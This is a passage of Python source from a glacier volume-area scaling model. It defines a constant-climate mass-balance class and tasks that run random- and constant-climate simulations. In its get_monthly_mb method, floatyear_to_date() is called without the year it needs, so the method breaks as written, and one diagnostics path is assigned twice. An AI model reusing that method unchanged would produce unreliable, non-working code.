time. Setting it to a fixed seed accross glaciers can
be usefull if you want to have the same climate years for all of them
temperature_bias : float, optional
add a bias to the temperature timeseries, default = None
climate_filename : str, optional
name of the climate file, e.g. 'climate_monthly' (default) or
'gcm_data'
climate_input_filesuffix: str, optional
filesuffix for the input climate file
output_filesuffix : str, optional
this add a suffix to the output file (useful to avoid overwriting
previous experiments)
init_area_m2: float, optional
glacier area with which the model is initialized, default is RGI value
unique_samples: bool, optional
if true, chosen random mass-balance years will only be available once
per random climate period-length
if false, every model year will be chosen from the random climate
period with the same probability (default)
Returns
-------
:py:class:`oggm.core.vascaling.VAScalingModel`
"""
# instance mass balance model
mb_mod = RandomVASMassBalance(gdir, y0=y0, halfsize=halfsize, bias=bias,
seed=seed, filename=climate_filename,
input_filesuffix=climate_input_filesuffix,
unique_samples=unique_samples)
if temperature_bias is not None:
# add given temperature bias to mass balance model
mb_mod.temp_bias = temperature_bias
# where to store the model output
diag_path = gdir.get_filepath('model_diagnostics', filesuffix='vas',
delete=True)
# instance the model
min_hgt, max_hgt = get_min_max_elevation(gdir)
if init_area_m2 is None:
init_area_m2 = gdir.rgi_area_m2
model = VAScalingModel(year_0=0, area_m2_0=init_area_m2,
min_hgt=min_hgt, max_hgt=max_hgt,
mb_model=mb_mod)
# specify path where to store model diagnostics
diag_path = gdir.get_filepath('model_diagnostics',
filesuffix=output_filesuffix,
delete=True)
# run model
model.run_until_and_store(year_end=nyears, diag_path=diag_path)
return model
class ConstantVASMassBalance(MassBalanceModel):
"""Constant mass-balance during a chosen period.
This is useful for equilibrium experiments.
"""
def __init__(self, gdir, mu_star=None, bias=None,
y0=None, halfsize=15, filename='climate_monthly',
input_filesuffix=''):
"""Initialize.
Parameters
----------
gdir : GlacierDirectory
the glacier directory
mu_star : float, optional
set to the alternative value of mu* you want to use
(the default is to use the calibrated value)
bias : float, optional
set to the alternative value of the calibration bias [mm we yr-1]
you want to use (the default is to use the calibrated value)
Note that this bias is *substracted* from the computed MB. Indeed:
BIAS = MODEL_MB - REFERENCE_MB.
y0 : int, optional, default: tstar
the year at the center of the period of interest. The default
is to use tstar as center.
halfsize : int, optional
the half-size of the time window (window size = 2 * halfsize + 1)
filename : str, optional
set to a different BASENAME if you want to use alternative climate
data.
input_filesuffix : str
the file suffix of the input climate file
"""
super(ConstantVASMassBalance, self).__init__()
# initialize the VAS equivalent of the PastMassBalance model over the
# whole available climate period
self.mbmod = VAScalingMassBalance(gdir, mu_star=mu_star, bias=bias,
filename=filename,
input_filesuffix=input_filesuffix)
# use t* as the center of the climatological period if not given
if y0 is None:
df = gdir.read_json('vascaling_mustar')
y0 = df['t_star']
# set model properties
self.prcp_clim = self.mbmod.prcp_clim
self.y0 = y0
self.halfsize = halfsize
self.years = np.arange(y0 - halfsize, y0 + halfsize + 1)
self.hemisphere = gdir.hemisphere
@property
def temp_bias(self):
"""Temperature bias to add to the original series."""
return self.mbmod.temp_bias
@temp_bias.setter
def temp_bias(self, value):
"""Temperature bias to add to the original series."""
for attr_name in ['_lazy_interp_yr', '_lazy_interp_m']:
if hasattr(self, attr_name):
delattr(self, attr_name)
self.mbmod.temp_bias = value
@property
def prcp_bias(self):
"""Precipitation factor to apply to the original series."""
return self.mbmod.prcp_bias
@prcp_bias.setter
def prcp_bias(self, value):
"""Precipitation factor to apply to the original series."""
for attr_name in ['_lazy_interp_yr', '_lazy_interp_m']:
if hasattr(self, attr_name):
delattr(self, attr_name)
self.mbmod.prcp_bias = value
@property
def bias(self):
"""Residual bias to apply to the original series."""
return self.mbmod.bias
@bias.setter
def bias(self, value):
"""Residual bias to apply to the original series."""
self.mbmod.bias = value
def get_climate(self, min_hgt, max_hgt, year=None):
"""Average mass balance climate information for given glacier.
Note that prcp is corrected with the precipitation factor and that
all other biases (precipitation, temp) are applied.
Returns
-------
[float, float]
(temp_for_melt) positive terminus temperature [degC] and
(prcp_solid) solid precipitation amount [kg/m^2]
"""
# create monthly timeseries over whole climate period
yrs = utils.monthly_timeseries(self.years[0], self.years[-1],
include_last_year=True)
# create empty containers
temp = list()
prcp = list()
# iterate over all months
for i, yr in enumerate(yrs):
# get positive melting temperature and solid precipitaion
t, p = self.mbmod.get_monthly_climate(min_hgt, max_hgt, year=yr)
temp.append(t)
prcp.append(p)
# Note that we do not weight for number of days per month - bad
return (np.mean(temp, axis=0),
np.mean(prcp, axis=0))
def get_monthly_mb(self, min_hgt, max_hgt, year=None):
""" Wrapper around the class intern mass balance model function.
Compute and return the glacier wide mass balance
for the given year/month combination.
Possible mb bias is applied...
Parameters
----------
min_hgt : float
glacier terminus elevation [m asl.]
max_hgt : float
maximal glacier (surface) elevation [m asl.]
year : float
floating year and month, following the hydrological year convention
Returns
-------
float
average glacier wide mass balance [m/s]
"""
# extract month from year
_, m = utils.floatyear_to_date()
# sum up the mass balance over all years in climate period
years = [utils.date_to_floatyear(yr, m) for yr in self.years]
mb = [self.mbmod.get_annual_mb(min_hgt, max_hgt, year=yr)
for yr in years]
# return average value
return np.average(mb)
def get_annual_mb(self, min_hgt, max_hgt, year=None):
""" Wrapper around the class intern mass balance model function.
Compute and return the annual glacier wide mass balance for the given
year. Possible mb bias is applied.
Parameters
----------
min_hgt : float
glacier terminus elevation
max_hgt : float
maximal glacier (surface) elevation
year : float
floating year, following the hydrological year convention
Returns
-------
float
average glacier wide mass balance [m/s]
"""
# sum up the mass balance over all years in climate period
mb = [self.mbmod.get_annual_mb(min_hgt, max_hgt, year=yr)
for yr in self.years]
# return average value
return np.average(mb)
def get_specific_mb(self, min_hgt, max_hgt, year=None):
""" Wrapper around the class intern mass balance model function.
Compute and return the annual specific mass balance for the given year.
Possible mb bias is applied.
Parameters
----------
min_hgt : float
glacier terminus elevation
max_hgt : float
maximal glacier (surface) elevation
year : float
float year, using the hydrological year convention
Returns
-------
float
glacier wide average mass balance, units of millimeter water
equivalent per year [mm w.e./yr]
"""
mb = [self.mbmod.get_specific_mb(min_hgt, max_hgt, year=yr)
for yr in self.years]
# return average value
return np.average(mb)
def get_ela(self, year=None):
"""The ELA can not be calculated using this mass balance model.
Parameters
----------
year : float, optional
Raises
-------
NotImplementedError
"""
return self.mbmod.get_ela(year=self.y0)
@entity_task(log)
def run_constant_climate(gdir, nyears=1000, y0=None, halfsize=15,
bias=None, temperature_bias=None,
climate_filename='climate_monthly',
climate_input_filesuffix='', output_filesuffix='',
init_area_m2=None):
"""
Runs the constant mass balance model for a given number of years.
This initializes a :py:class:`oggm.core.vascaling.ConstantVASMassBalance`,
and runs and stores a :py:class:`oggm.core.vascaling.VAScalingModel` with
the given mass balance model.
Parameters
----------
gdir : :py:class:`oggm.GlacierDirectory`
the glacier directory to process
nyears : int, optional
length of the simulation, default = 1000
y0 : int, optional
central year of the random climate period. The default is to be
centred on t*. Default = None
halfsize : int, optional
the half-size of the time window (window size = 2 * halfsize + 1),
default = 15
bias : float, optional
bias of the mb model. Default is to use the calibrated one, which
is often a better idea. For t* experiments it can be useful to set it
to zero. Default = None
temperature_bias : float, optional
add a bias to the temperature timeseries, default = None
climate_filename : str, optional
name of the climate file, e.g. 'climate_monthly' (default) or
'gcm_data'
climate_input_filesuffix: str, optional
filesuffix for the input climate file
output_filesuffix : str, optional
this add a suffix to the output file (useful to avoid overwriting
previous experiments)
init_area_m2: float, optional
glacier area with which the model is initialized, default is RGI value
Returns
-------
:py:class:`oggm.core.vascaling.VAScalingModel`
"""
# instance mass balance model
mb_mod = ConstantVASMassBalance(gdir, mu_star=None, bias=bias, y0=y0,
halfsize=halfsize,
filename=climate_filename,
input_filesuffix=climate_input_filesuffix)
if temperature_bias is not None:
# add given temperature bias to mass balance model
mb_mod.temp_bias = temperature_bias
# instance the model
min_hgt, max_hgt = get_min_max_elevation(gdir)
if init_area_m2 is None:
init_area_m2 = gdir.rgi_area_m2
model = VAScalingModel(year_0=0, area_m2_0=init_area_m2,
min_hgt=min_hgt, max_hgt=max_hgt,
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.